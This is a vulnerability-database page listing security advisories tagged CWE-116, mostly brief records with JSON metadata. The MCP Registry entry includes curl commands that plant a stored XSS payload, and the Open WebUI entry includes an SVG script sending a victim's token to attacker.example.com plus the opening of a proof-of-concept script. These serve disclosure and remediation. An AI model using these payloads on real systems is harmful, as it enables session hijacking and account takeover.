CWE-116
Allowed-with-ReviewImproper Encoding or Escaping of Output
Abstraction: Class · Status: Draft
The product prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved.
611 vulnerabilities reference this CWE, most recent first.
GHSA-RQV2-M695-F8J4
Vulnerability from github – Published: 2026-05-08 17:18 – Updated: 2026-05-15 23:46Summary
The public catalogue UI served at GET / (file internal/api/handlers/v0/ui_index.html) is vulnerable to stored cross-site scripting via the server.websiteUrl field of any published server.json. Server-side validation in internal/validators/validators.go (validateWebsiteURL) only checks that the URL parses, is absolute, and uses the https scheme; it does not reject quote characters. Client-side, the value is interpolated into a double-quoted href attribute via innerHTML, using a homegrown escapeHtml helper that performs the standard textContent → innerHTML round-trip. Per the HTML serialisation algorithm, that round-trip encodes only &, <, > and U+00A0 inside text nodes — it does not encode " or '. A literal " in websiteUrl therefore breaks out of the href attribute, allowing arbitrary on* event handlers to be appended to the same <a> element. The Content-Security-Policy on / is script-src 'self' 'unsafe-inline' https://cdn.tailwindcss.com, so the injected event handlers execute.
Any user able to obtain a publish token (e.g. via POST /v0/auth/github-at with their own GitHub account, or POST /v0/auth/none on a deployment that has anonymous auth enabled) can plant a poisoned record visible to every visitor of the registry homepage.
Affected component
- Validator:
internal/validators/validators.go—validateWebsiteURL(lines 153–199) - Sink:
internal/api/handlers/v0/ui_index.html—toggleDetails(card, item)at line 432, thehrefattribute built aroundescapeHtml(server.websiteUrl) - Helper:
escapeHtmldefined atinternal/api/handlers/v0/ui_index.htmllines 494–498
Proof of concept
- Obtain a Registry JWT for any namespace you control (a GitHub OAuth exchange against a throwaway account suffices):
bash
TOKEN=$(curl -sS -X POST https://registry.modelcontextprotocol.io/v0/auth/github-at \
-H 'Content-Type: application/json' \
-d '{"github_token":"<gh-pat>"}' | jq -r .registry_token)
- Publish a server with a poisoned
websiteUrl. The literal"is preserved end-to-end:
bash
curl -sS -X POST https://registry.modelcontextprotocol.io/v0/publish \
-H "Authorization: Bearer $TOKEN" \
-H 'Content-Type: application/json' \
--data-binary @- <<'EOF'
{
"$schema": "https://static.modelcontextprotocol.io/schemas/2025-09-29/server.schema.json",
"name": "io.github.<your-account>/xss-poc",
"version": "0.0.1",
"description": "hover the website link",
"websiteUrl": "https://example.com/\"onmouseover=alert(document.domain)//"
}
EOF
- Visit
https://registry.modelcontextprotocol.io/, search forxss-poc, click the card to expand it, then hover the Website link in the details panel. The injectedonmouseoverfires andalert(document.domain)runs on theregistry.modelcontextprotocol.ioorigin.
Why server-side validation does not catch this
Go's net/url.Parse accepts literal " in the path component:
input="https://example.com/\"onmouseover=alert(1)//" IsAbs=true Scheme="https" Path="/\"onmouseover=alert(1)//"
Neither the Huma format:"uri" annotation nor validateWebsiteURL's scheme/IsAbs triplet rejects this string. The architecture's existing protection — repository.url is regex-locked to ^https?://(www\.)?github\.com/[\w.-]+/[\w.-]+/?$ and therefore cannot contain quotes — does not extend to websiteUrl, which has no allowlist.
Why client-side escapeHtml does not catch this
function escapeHtml(text) {
const div = document.createElement('div');
div.textContent = text;
return div.innerHTML;
}
Per the HTML5 spec (§13.3 Serialising HTML fragments), the only characters encoded inside the text content of an element are &, <, >, and U+00A0. " and ' are not encoded because in a text-content context they are not special. The helper is therefore safe in element-text contexts (where it is correctly used for name, version, description, etc.) but unsafe inside an attribute value, which is precisely where it is invoked for href on lines 432 and 426.
Impact
- Stored XSS on the official MCP Registry homepage. The malicious entry sits in the public catalogue alongside legitimate ones; any user expanding the entry triggers the payload.
- Because the page is served on the official
registry.modelcontextprotocol.ioorigin, the injected script can: - Read and overwrite
localStorage(baseUrl,customUrl), pinning the user's subsequent reads to an attacker-controlled "Custom" base URL. - Issue any same-origin or cross-origin XHR (
connect-src *is granted). - Phish for Registry JWTs by injecting fake auth flows on the trusted origin.
- The CSP
script-src 'self' 'unsafe-inline' https://cdn.tailwindcss.comdoes not block this because'unsafe-inline'permits inline event-handler attributes.
Suggested remediation (any one suffices)
- Replace the homegrown
escapeHtmlwith an attribute-safe encoder that also escapes",', backtick, and=— the OWASP HTML attribute-encoding rule. - Avoid building the
hrefvia string templates. UsesetAttribute('href', value)instead —setAttributeis not subject to HTML tokenisation, so no breakout is possible. - Tighten
validateWebsiteURLto reject any URL whose raw bytes contain",',<,>,,\t, or\n, or — conservatively — store the canonical re-serialised form (parsedURL.String()percent-encodes such characters in the path). - Drop
'unsafe-inline'fromscript-srcafter auditing the inline scripts on the page.
Approach (3) is the smallest server-side change and immediately neutralises the exploit for any new publishes; approaches (1) or (2) close the class of bug at the sink so future fields with similar patterns are safe by default.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/modelcontextprotocol/registry"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.7.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44429"
],
"database_specific": {
"cwe_ids": [
"CWE-116",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-08T17:18:32Z",
"nvd_published_at": "2026-05-14T21:16:46Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nThe public catalogue UI served at `GET /` (file `internal/api/handlers/v0/ui_index.html`) is vulnerable to stored cross-site scripting via the `server.websiteUrl` field of any published `server.json`. Server-side validation in `internal/validators/validators.go` (`validateWebsiteURL`) only checks that the URL parses, is absolute, and uses the `https` scheme; it does not reject quote characters. Client-side, the value is interpolated into a double-quoted `href` attribute via `innerHTML`, using a homegrown `escapeHtml` helper that performs the standard `textContent` \u2192 `innerHTML` round-trip. Per the HTML serialisation algorithm, that round-trip encodes only `\u0026`, `\u003c`, `\u003e` and U+00A0 inside text nodes \u2014 it does **not** encode `\"` or `\u0027`. A literal `\"` in `websiteUrl` therefore breaks out of the `href` attribute, allowing arbitrary `on*` event handlers to be appended to the same `\u003ca\u003e` element. The Content-Security-Policy on `/` is `script-src \u0027self\u0027 \u0027unsafe-inline\u0027 https://cdn.tailwindcss.com`, so the injected event handlers execute.\n\nAny user able to obtain a publish token (e.g. via `POST /v0/auth/github-at` with their own GitHub account, or `POST /v0/auth/none` on a deployment that has anonymous auth enabled) can plant a poisoned record visible to every visitor of the registry homepage.\n\n## Affected component\n\n- Validator: `internal/validators/validators.go` \u2014 `validateWebsiteURL` (lines 153\u2013199)\n- Sink: `internal/api/handlers/v0/ui_index.html` \u2014 `toggleDetails(card, item)` at line 432, the `href` attribute built around `escapeHtml(server.websiteUrl)`\n- Helper: `escapeHtml` defined at `internal/api/handlers/v0/ui_index.html` lines 494\u2013498\n\n## Proof of concept\n\n1. Obtain a Registry JWT for any namespace you control (a GitHub OAuth exchange against a throwaway account suffices):\n\n ```bash\n TOKEN=$(curl -sS -X POST https://registry.modelcontextprotocol.io/v0/auth/github-at \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\"github_token\":\"\u003cgh-pat\u003e\"}\u0027 | jq -r .registry_token)\n ```\n\n2. Publish a server with a poisoned `websiteUrl`. The literal `\"` is preserved end-to-end:\n\n ```bash\n curl -sS -X POST https://registry.modelcontextprotocol.io/v0/publish \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data-binary @- \u003c\u003c\u0027EOF\u0027\n {\n \"$schema\": \"https://static.modelcontextprotocol.io/schemas/2025-09-29/server.schema.json\",\n \"name\": \"io.github.\u003cyour-account\u003e/xss-poc\",\n \"version\": \"0.0.1\",\n \"description\": \"hover the website link\",\n \"websiteUrl\": \"https://example.com/\\\"onmouseover=alert(document.domain)//\"\n }\n EOF\n ```\n\n3. Visit `https://registry.modelcontextprotocol.io/`, search for `xss-poc`, click the card to expand it, then hover the **Website** link in the details panel. The injected `onmouseover` fires and `alert(document.domain)` runs on the `registry.modelcontextprotocol.io` origin.\n\n## Why server-side validation does not catch this\n\nGo\u0027s `net/url.Parse` accepts literal `\"` in the path component:\n\n```\ninput=\"https://example.com/\\\"onmouseover=alert(1)//\" IsAbs=true Scheme=\"https\" Path=\"/\\\"onmouseover=alert(1)//\"\n```\n\nNeither the Huma `format:\"uri\"` annotation nor `validateWebsiteURL`\u0027s scheme/`IsAbs` triplet rejects this string. The architecture\u0027s existing protection \u2014 `repository.url` is regex-locked to `^https?://(www\\.)?github\\.com/[\\w.-]+/[\\w.-]+/?$` and therefore cannot contain quotes \u2014 does not extend to `websiteUrl`, which has no allowlist.\n\n## Why client-side `escapeHtml` does not catch this\n\n```js\nfunction escapeHtml(text) {\n const div = document.createElement(\u0027div\u0027);\n div.textContent = text;\n return div.innerHTML;\n}\n```\n\nPer the HTML5 spec (\u00a713.3 Serialising HTML fragments), the only characters encoded inside the text content of an element are `\u0026`, `\u003c`, `\u003e`, and U+00A0. `\"` and `\u0027` are **not** encoded because in a text-content context they are not special. The helper is therefore safe in element-text contexts (where it is correctly used for `name`, `version`, `description`, etc.) but unsafe inside an attribute value, which is precisely where it is invoked for `href` on lines 432 and 426.\n\n## Impact\n\n- Stored XSS on the official MCP Registry homepage. The malicious entry sits in the public catalogue alongside legitimate ones; any user expanding the entry triggers the payload.\n- Because the page is served on the official `registry.modelcontextprotocol.io` origin, the injected script can:\n - Read and overwrite `localStorage` (`baseUrl`, `customUrl`), pinning the user\u0027s subsequent reads to an attacker-controlled \"Custom\" base URL.\n - Issue any same-origin or cross-origin XHR (`connect-src *` is granted).\n - Phish for Registry JWTs by injecting fake auth flows on the trusted origin.\n- The CSP `script-src \u0027self\u0027 \u0027unsafe-inline\u0027 https://cdn.tailwindcss.com` does not block this because `\u0027unsafe-inline\u0027` permits inline event-handler attributes.\n\n## Suggested remediation (any one suffices)\n\n1. Replace the homegrown `escapeHtml` with an attribute-safe encoder that also escapes `\"`, `\u0027`, backtick, and `=` \u2014 the OWASP HTML attribute-encoding rule.\n2. Avoid building the `href` via string templates. Use `setAttribute(\u0027href\u0027, value)` instead \u2014 `setAttribute` is not subject to HTML tokenisation, so no breakout is possible.\n3. Tighten `validateWebsiteURL` to reject any URL whose raw bytes contain `\"`, `\u0027`, `\u003c`, `\u003e`, ` `, `\\t`, or `\\n`, or \u2014 conservatively \u2014 store the canonical re-serialised form (`parsedURL.String()` percent-encodes such characters in the path).\n4. Drop `\u0027unsafe-inline\u0027` from `script-src` after auditing the inline scripts on the page.\n\nApproach (3) is the smallest server-side change and immediately neutralises the exploit for any new publishes; approaches (1) or (2) close the class of bug at the sink so future fields with similar patterns are safe by default.",
"id": "GHSA-rqv2-m695-f8j4",
"modified": "2026-05-15T23:46:13Z",
"published": "2026-05-08T17:18:32Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/modelcontextprotocol/registry/security/advisories/GHSA-rqv2-m695-f8j4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44429"
},
{
"type": "WEB",
"url": "https://github.com/modelcontextprotocol/registry/pull/1249"
},
{
"type": "WEB",
"url": "https://github.com/modelcontextprotocol/registry/commit/78b7bbde07948049b916d76b4769faee461ff930"
},
{
"type": "PACKAGE",
"url": "https://github.com/modelcontextprotocol/registry"
},
{
"type": "WEB",
"url": "https://github.com/modelcontextprotocol/registry/releases/tag/v1.7.7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:N/SI:L/SA:L",
"type": "CVSS_V4"
}
],
"summary": "MCP Registry vulnerable to stored XSS in catalogue UI via attribute-quote breakout in publisher-controlled `websiteUrl`"
}
GHSA-RRVF-5W4R-3X7V
Vulnerability from github – Published: 2024-04-09 18:30 – Updated: 2024-10-03 18:08Improper Encoding or Escaping of Output vulnerability in Apache Zeppelin.
Attackers can modify helium.json and perform cross-site scripting attacks on normal users. This issue affects Apache Zeppelin: from 0.8.2 before 0.11.1.
Users are recommended to upgrade to version 0.11.1, which fixes the issue.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.zeppelin:zeppelin-interpreter"
},
"ranges": [
{
"events": [
{
"introduced": "0.8.2"
},
{
"fixed": "0.11.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-31868"
],
"database_specific": {
"cwe_ids": [
"CWE-116",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2024-04-11T20:13:12Z",
"nvd_published_at": "2024-04-09T16:15:08Z",
"severity": "MODERATE"
},
"details": "Improper Encoding or Escaping of Output vulnerability in Apache Zeppelin.\n\nAttackers can modify `helium.json` and perform cross-site scripting attacks on normal users. This issue affects Apache Zeppelin: from 0.8.2 before 0.11.1.\n\nUsers are recommended to upgrade to version 0.11.1, which fixes the issue.\n\n",
"id": "GHSA-rrvf-5w4r-3x7v",
"modified": "2024-10-03T18:08:07Z",
"published": "2024-04-09T18:30:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31868"
},
{
"type": "WEB",
"url": "https://github.com/apache/zeppelin/pull/4728"
},
{
"type": "WEB",
"url": "https://github.com/apache/zeppelin/commit/83685795e0ec8d3059fd7a3dbcae5c0532b63b79"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/zeppelin"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/55mqs673plsxmgnq7fdf2flftpllyf11"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2024/04/09/11"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Apache Zeppelin vulnerable to cross-site scripting in the helium module"
}
GHSA-RV64-5GF8-9QQ8
Vulnerability from github – Published: 2026-04-09 21:31 – Updated: 2026-04-10 21:38Improper Encoding or Escaping of Output vulnerability in the JsonAccessLogValve component of Apache Tomcat.
This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.20, from 10.1.0-M1 through 10.1.53, from 9.0.40 through 9.0.116.
Users are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117 , which fix the issue.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.tomcat:tomcat-catalina"
},
"ranges": [
{
"events": [
{
"introduced": "9.0.40"
},
{
"fixed": "9.0.116"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.tomcat:tomcat-catalina"
},
"ranges": [
{
"events": [
{
"introduced": "10.1.0-M1"
},
{
"fixed": "10.1.54"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.tomcat:tomcat-catalina"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0-M1"
},
{
"fixed": "11.0.21"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.tomcat:tomcat"
},
"ranges": [
{
"events": [
{
"introduced": "9.0.40"
},
{
"fixed": "9.0.116"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.tomcat:tomcat"
},
"ranges": [
{
"events": [
{
"introduced": "10.1.0-M1"
},
{
"fixed": "10.1.54"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.tomcat:tomcat"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0-M1"
},
{
"fixed": "11.0.21"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.tomcat.embed:tomcat-embed-core"
},
"ranges": [
{
"events": [
{
"introduced": "9.0.40"
},
{
"fixed": "9.0.116"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.tomcat.embed:tomcat-embed-core"
},
"ranges": [
{
"events": [
{
"introduced": "10.1.0-M1"
},
{
"fixed": "10.1.54"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.tomcat.embed:tomcat-embed-core"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0-M1"
},
{
"fixed": "11.0.21"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34483"
],
"database_specific": {
"cwe_ids": [
"CWE-116"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-10T21:38:21Z",
"nvd_published_at": "2026-04-09T20:16:24Z",
"severity": "HIGH"
},
"details": "Improper Encoding or Escaping of Output vulnerability in the JsonAccessLogValve component of Apache Tomcat.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.20, from 10.1.0-M1 through 10.1.53, from 9.0.40 through 9.0.116.\n\nUsers are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117 , which fix the issue.",
"id": "GHSA-rv64-5gf8-9qq8",
"modified": "2026-04-10T21:38:22Z",
"published": "2026-04-09T21:31:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34483"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/tomcat"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/j1w7304yonlr8vo1tkb5nfs7od1y228b"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2026/04/09/26"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Apache Tomcat has an Improper Encoding or Escaping of Output vulnerability in the JsonAccessLogValve"
}
GHSA-RVFH-H6C7-FC3C
Vulnerability from github – Published: 2024-05-05 21:30 – Updated: 2025-06-17 22:33Gradio before 4.20 allows credential leakage on Windows.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "gradio"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.20.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-34510"
],
"database_specific": {
"cwe_ids": [
"CWE-116"
],
"github_reviewed": true,
"github_reviewed_at": "2025-06-17T22:33:34Z",
"nvd_published_at": "2024-05-05T20:15:07Z",
"severity": "HIGH"
},
"details": "Gradio before 4.20 allows credential leakage on Windows.",
"id": "GHSA-rvfh-h6c7-fc3c",
"modified": "2025-06-17T22:33:34Z",
"published": "2024-05-05T21:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34510"
},
{
"type": "PACKAGE",
"url": "https://github.com/gradio-app/gradio"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/gradio/PYSEC-2024-255.yaml"
},
{
"type": "WEB",
"url": "https://www.gradio.app/changelog#4-20-0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Gradio allows credential leakage on Windows"
}
GHSA-RWC4-W23C-GC77
Vulnerability from github – Published: 2022-03-29 00:01 – Updated: 2022-04-05 00:00The Menu Image, Icons made easy WordPress plugin before 3.0.8 does not have authorisation and CSRF checks when saving menu settings, and does not validate, sanitise and escape them. As a result, any authenticate users, such as subscriber can update the settings or arbitrary menu and put Cross-Site Scripting payloads in them which will be triggered in the related menu in the frontend
{
"affected": [],
"aliases": [
"CVE-2022-0450"
],
"database_specific": {
"cwe_ids": [
"CWE-116",
"CWE-79"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-03-28T18:15:00Z",
"severity": "MODERATE"
},
"details": "The Menu Image, Icons made easy WordPress plugin before 3.0.8 does not have authorisation and CSRF checks when saving menu settings, and does not validate, sanitise and escape them. As a result, any authenticate users, such as subscriber can update the settings or arbitrary menu and put Cross-Site Scripting payloads in them which will be triggered in the related menu in the frontend",
"id": "GHSA-rwc4-w23c-gc77",
"modified": "2022-04-05T00:00:53Z",
"published": "2022-03-29T00:01:12Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-0450"
},
{
"type": "WEB",
"url": "https://wpscan.com/vulnerability/612f9273-acc8-4be6-b372-33f1e687f54a"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RXH5-JM9F-FMWJ
Vulnerability from github – Published: 2024-10-05 03:30 – Updated: 2024-10-23 15:31Improper Encoding or Escaping of Output vulnerability in The Wikimedia Foundation Mediawiki - CSS Extension allows Code Injection.This issue affects Mediawiki - CSS Extension: from 1.39.X before 1.39.9, from 1.41.X before 1.41.3, from 1.42.X before 1.42.2.
{
"affected": [],
"aliases": [
"CVE-2024-47845"
],
"database_specific": {
"cwe_ids": [
"CWE-116"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-05T01:15:12Z",
"severity": "MODERATE"
},
"details": "Improper Encoding or Escaping of Output vulnerability in The Wikimedia Foundation Mediawiki - CSS Extension allows Code Injection.This issue affects Mediawiki - CSS Extension: from 1.39.X before 1.39.9, from 1.41.X before 1.41.3, from 1.42.X before 1.42.2.",
"id": "GHSA-rxh5-jm9f-fmwj",
"modified": "2024-10-23T15:31:03Z",
"published": "2024-10-05T03:30:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47845"
},
{
"type": "WEB",
"url": "https://gerrit.wikimedia.org/r/q/I6f38f4a8fc1dcd690ab27b8f18ce6ca903bacc53"
},
{
"type": "WEB",
"url": "https://phabricator.wikimedia.org/T368594"
},
{
"type": "WEB",
"url": "https://phabricator.wikimedia.org/T368628"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-RXRC-RGV4-JPVX
Vulnerability from github – Published: 2023-10-19 15:31 – Updated: 2024-09-12 18:41The React Developer Tools extension registers a message listener with window.addEventListener('message', ) in a content script that is accessible to any webpage that is active in the browser. Within the listener is code that requests a URL derived from the received message via fetch(). The URL is not validated or sanitised before it is fetched, thus allowing a malicious web page to arbitrarily fetch URL’s via the victim's browser.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "react-devtools-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.28.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-5654"
],
"database_specific": {
"cwe_ids": [
"CWE-116",
"CWE-285"
],
"github_reviewed": true,
"github_reviewed_at": "2023-10-20T22:26:13Z",
"nvd_published_at": "2023-10-19T15:15:09Z",
"severity": "MODERATE"
},
"details": "The React Developer Tools extension registers a message listener with window.addEventListener(\u0027message\u0027, \u003clistener\u003e) in a content script that is accessible to any webpage that is active in the browser. Within the listener is code that requests a URL derived from the received message via fetch(). The URL is not validated or sanitised before it is fetched, thus allowing a malicious web page to arbitrarily fetch URL\u2019s via the victim\u0027s browser.",
"id": "GHSA-rxrc-rgv4-jpvx",
"modified": "2024-09-12T18:41:02Z",
"published": "2023-10-19T15:31:08Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5654"
},
{
"type": "WEB",
"url": "https://github.com/facebook/react/pull/27417"
},
{
"type": "WEB",
"url": "https://github.com/facebook/react/commit/09285d5a7f1c08bec09f44cec3d0518a603597fc"
},
{
"type": "WEB",
"url": "https://github.com/facebook/react/commit/94d5b5b2bf5204ebd289a113989c0e2c51b626ef"
},
{
"type": "WEB",
"url": "https://gist.github.com/CalumHutton/1fb89b64409570a43f89d1fd3274b231"
},
{
"type": "PACKAGE",
"url": "https://github.com/facebook/react"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "React Developer Tools extension Improper Authorization vulnerability"
}
GHSA-V2QM-5WXJ-QHJ7
Vulnerability from github – Published: 2026-06-17 14:15 – Updated: 2026-06-17 14:15Stored XSS to Account Takeover via Model Profile Images in Open WebUI
Affected: Open WebUI <= 0.9.5 Bypass of: GHSA-3wgj-c2hg-vm6q, GHSA-3856-3vxq-m6fc
TL;DR
Open WebUI patched SVG XSS in user profile images and webhook profile images but forgot to apply the same fix to model profile images. The ModelMeta class has no validate_profile_image_url field validator, and the model image serving endpoint has no MIME allowlist or nosniff header. Any authenticated user with workspace.models permission (enabled by default) can store a data:image/svg+xml;base64,... payload in a model's profile image and achieve full account takeover of anyone who navigates to the image URL.
Past of the issue
In early 2025, two security advisories landed for Open WebUI:
- GHSA-3wgj-c2hg-vm6q SVG XSS via user profile images
- GHSA-3856-3vxq-m6fc SVG XSS via webhook profile images
The patches were clean. A validate_profile_image_url function was introduced in backend/open_webui/utils/validate.py a compiled regex that restricts data: URIs to safe raster formats (image/png, image/jpeg, image/gif, image/webp), explicitly excluding image/svg+xml because SVG can carry embedded <script> tags. On the output side, users.py added a MIME allowlist check and X-Content-Type-Options: nosniff.
The fix was applied to UserUpdateForm, UpdateProfileForm, and later to ChannelWebhookForm. Three models patched. Case closed.
Except there was a fourth endpoint.
The Gap
Open WebUI has a concept of "Models" user-created model configurations with metadata including a profile image. The metadata lives in ModelMeta:
# backend/open_webui/models/models.py, line 37-47
class ModelMeta(BaseModel):
profile_image_url: Optional[str] = '/static/favicon.png'
description: Optional[str] = None
capabilities: Optional[dict] = None
model_config = ConfigDict(extra='allow')
No @field_validator. No import of validate_profile_image_url. ModelMeta accepts any string as profile_image_url including data:image/svg+xml;base64,....
The serving endpoint at GET /api/v1/models/model/profile/image has the same gap:
# backend/open_webui/routers/models.py, line 503-518
elif profile_image_url.startswith('data:image'):
header, base64_data = profile_image_url.split(',', 1)
image_data = base64.b64decode(base64_data)
image_buffer = io.BytesIO(image_data)
media_type = header.split(';')[0].lstrip('data:')
headers = {'Content-Disposition': 'inline'}
# ...
return StreamingResponse(
image_buffer,
media_type=media_type,
headers=headers,
)
No MIME allowlist. No nosniff. No CSP. The SVG is served inline with Content-Type: image/svg+xml on the application's origin.
Compare this with the patched user endpoint:
# backend/open_webui/routers/users.py, line 497-509
media_type = header.split(';')[0].lstrip('data:').lower()
if media_type not in PROFILE_IMAGE_ALLOWED_MIME_TYPES: # <-- ABSENT in models.py
return FileResponse(f'{STATIC_DIR}/user.png')
return StreamingResponse(
image_buffer,
media_type=media_type,
headers={
'Content-Disposition': 'inline',
'X-Content-Type-Options': 'nosniff', # <-- ABSENT in models.py
},
)
The fix exists. It just was never applied here.
Comparison Table
| Endpoint | Input Validation | MIME Allowlist | nosniff | Status |
|---|---|---|---|---|
GET /users/{id}/profile/image |
YES | YES | YES | Patched |
GET /webhooks/{id}/profile/image |
YES | no | no | Partially patched |
GET /models/model/profile/image |
NO | NO | NO | Vulnerable |
Three Write Vectors
The malicious SVG data URI can be injected through any of three endpoints all pass ModelForm containing ModelMeta without validation:
POST /api/v1/models/create(line 195) any user withworkspace.modelspermissionPOST /api/v1/models/update(line 581) model owner or adminPOST /api/v1/models/import(line 279) admin only
The workspace.models permission is enabled by default for all non-pending users in a standard deployment.
The Attack
Step 1 Store the payload:
SVG=$(echo '<svg xmlns="http://www.w3.org/2000/svg">
<script>
new Image().src="https://attacker.example.com/steal?t="+localStorage.getItem("token")
</script>
</svg>' | base64 -w0)
curl -s -X POST 'https://TARGET/api/v1/models/create' \
-H "Authorization: Bearer $ATTACKER_TOKEN" \
-H 'Content-Type: application/json' \
-d "{
\"id\": \"gpt-4-turbo-preview\",
\"name\": \"GPT-4 Turbo\",
\"base_model_id\": \"gpt-4\",
\"meta\": {
\"profile_image_url\": \"data:image/svg+xml;base64,$SVG\",
\"description\": \"Latest GPT-4 Turbo model\"
},
\"params\": {},
\"access_grants\": []
}"
Step 2 Victim navigates to the image URL:
https://TARGET/api/v1/models/model/profile/image?id=gpt-4-turbo-preview
This happens naturally when a user right-clicks a model's avatar and selects "Open Image in New Tab", or when the attacker sends the URL directly (e.g., in a channel message).
Step 3 Token theft:
The server responds:
HTTP/1.1 200 OK
content-type: image/svg+xml
content-disposition: inline
<svg xmlns="http://www.w3.org/2000/svg">
<script>
new Image().src="https://attacker.example.com/steal?t="+localStorage.getItem("token")
</script>
</svg>
No X-Content-Type-Options. No Content-Security-Policy. The browser renders the SVG as a top-level document in the Open WebUI origin. The embedded <script> executes. localStorage.getItem("token") returns the victim's JWT. The attacker receives it and has full API access password changes, admin promotion, data exfiltration.
PoC
#!/usr/bin/env bash
# PoC: Stored SVG XSS -> token theft via Open WebUI model profile image
